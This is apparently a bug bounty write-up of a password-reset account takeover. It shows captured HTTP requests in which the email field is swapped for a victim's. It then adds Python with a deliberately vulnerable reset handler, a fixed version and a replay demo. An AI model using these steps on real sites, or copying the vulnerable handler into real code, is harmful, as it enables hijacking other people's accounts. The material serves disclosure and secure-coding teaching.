Hello everyone, how are you all? I wish you all well. Most applications give users a "Reset Password" function that works via email. This function has always been a point of interest for bug bounty hunters and security researchers: from basic attacks such as missing rate limiting and Host header injection up to full account takeover, it is a lot of fun to test and a big win, so it is worth investing time in.
I found this bug this week.

Reporting time: 06 August 2020 16:15:22
Accepted time: 06 August 2020
Fixed bug time: 06 August 2020 21:12

In this case, I will show you where the injection point is and how to reproduce it.
First, find the reset-password function on the application.

Let's assume you're a hacker and you want to take over an account:

1. find the reset-password function on the application
2. request a password reset for your own mail
3. open your mail and set up a new password
4. capture the HTTP request the application sends

OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer: https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close
Focus on the email parameter ducky%40example.com (this is the hacker's account). Change it to the victim's email, for example victim@example.com (URL-encode the @ as %40, giving "victim%40example.com"), and forward the request.
OPTIONS /api/new-password HTTP/1.1
Host: exaple.example.com
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv;68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Control-Request-Method: POST
Accept-Control-Request-Headers: content-type,x-requested-with,x-xsrf-token
Referer: https://example.com/reset-password?email=ducky%40example.com&token=87hiuhd987234iu32jd9w87423jdwoi743298
Origin: https://example.com
Connection: close
Cookie: XSRF-TOKEN=JALKJDUIEHDjlkjlkjdoijekjIHJlkjlijdeoiujlkdamOIHJkjoi3j298jiJOIJ8UJLIJlkjoijo; session=ijoi8UOIJOIJKlj98u9jKJLJ198UJLKJLKJJIJijiklkjoijlkj&*^&%*(HJhiu*&8udk

{"email":"ducky@example.com","password":"Jakarta123!","c_password":"Jakarta123!","token":"*jdiujoij9IOK98uoiKJ98UjoiKJ098"}
Look at the email field in the JSON body, "ducky@example.com" (shown in bold in the original): that is the hacker's account. Change it to the victim's account, forward the request and stop the capture.

Finally, the victim's account has been successfully taken over. The server reset the password of whatever email was supplied in the body, using a reset token that had been issued for the hacker's own address, without checking that the token belonged to that account.
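The root cause above is that the endpoint selects the account from the client-supplied email instead of from the token it issued. The following is an added example, not code from the original post or from the affected application: a minimal reset-password handler in two variants, one reproducing the flaw (the account is chosen by the body's "email" field) and one that looks the token up and takes the account from the token record, enforcing single use and expiry. The in-memory store, the record layout and the request dictionaries are constructed for this demo; the email addresses and password are the ones from the write-up.

```python
# Added example (not the original post's or the application's code): a
# password-reset endpoint in a vulnerable and a fixed variant. Store, record
# layout and request shape are constructed for the demo.
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass, field


@dataclass
class ResetRecord:
    """One issued reset token: which account it was issued for, and its hash."""
    email: str
    token_hash: str
    expires_at: float
    used: bool = False


@dataclass
class Store:
    """In-memory stand-in for the user and reset-token tables."""
    passwords: dict = field(default_factory=dict)   # email -> password (plain for brevity)
    resets: list = field(default_factory=list)


def _hash_token(token: str) -> str:
    # Only the hash is stored, so a database leak does not expose live tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(store: Store, email: str, ttl_seconds: int = 900) -> str:
    """Mint a random, single-use token bound to exactly one account."""
    token = secrets.token_urlsafe(32)
    store.resets.append(ResetRecord(email, _hash_token(token), time.time() + ttl_seconds))
    return token


def reset_password_vulnerable(store: Store, body: dict):
    """Same body shape as the write-up's /api/new-password request. The token is
    only checked for existence; the account to update comes from body["email"]."""
    token_hash = _hash_token(body["token"])
    if not any(r.token_hash == token_hash for r in store.resets):
        return 400, "invalid token"
    if body["password"] != body["c_password"]:
        return 400, "passwords do not match"
    # BUG: the caller chooses the account. A token issued for the attacker's
    # address resets whichever email the attacker puts here.
    store.passwords[body["email"]] = body["password"]
    return 200, "password updated"


def reset_password_fixed(store: Store, body: dict, now=None):
    """Look the token up, then use the email from the token record. The body's
    email is accepted only as a consistency check, never as the selector."""
    now = time.time() if now is None else now
    token_hash = _hash_token(body["token"])
    record = next(
        (r for r in store.resets if hmac.compare_digest(r.token_hash, token_hash)),
        None,
    )
    if record is None or record.used or record.expires_at < now:
        return 400, "invalid or expired token"
    if body.get("email", "").lower() != record.email.lower():
        return 400, "token was not issued for this account"
    if body["password"] != body["c_password"]:
        return 400, "passwords do not match"
    record.used = True                                  # single use
    store.passwords[record.email] = body["password"]    # account comes from the record
    return 200, "password updated"


def demo() -> dict:
    """Replay the write-up's attack against both handlers and report the outcome."""
    results = {}
    for name, handler in (("vulnerable", reset_password_vulnerable),
                          ("fixed", reset_password_fixed)):
        store = Store(passwords={"ducky@example.com": "old", "victim@example.com": "old"})
        token = issue_reset_token(store, "ducky@example.com")   # attacker's own reset mail
        body = {"email": "victim@example.com", "password": "Jakarta123!",
                "c_password": "Jakarta123!", "token": token}
        status, _ = handler(store, body)
        results[name] = (status, store.passwords["victim@example.com"])
    return results


if __name__ == "__main__":
    print(demo())   # {'vulnerable': (200, 'Jakarta123!'), 'fixed': (400, 'old')}
```

Running the module replays the write-up's request against both handlers: the vulnerable one returns 200 and overwrites the victim's password, the fixed one returns 400 and leaves it untouched. The defensive points are the ones a reviewer would check in a real implementation: the token record, not the request, identifies the account; the token is random, hashed at rest, expiring and single-use; and the lookup uses a constant-time comparison.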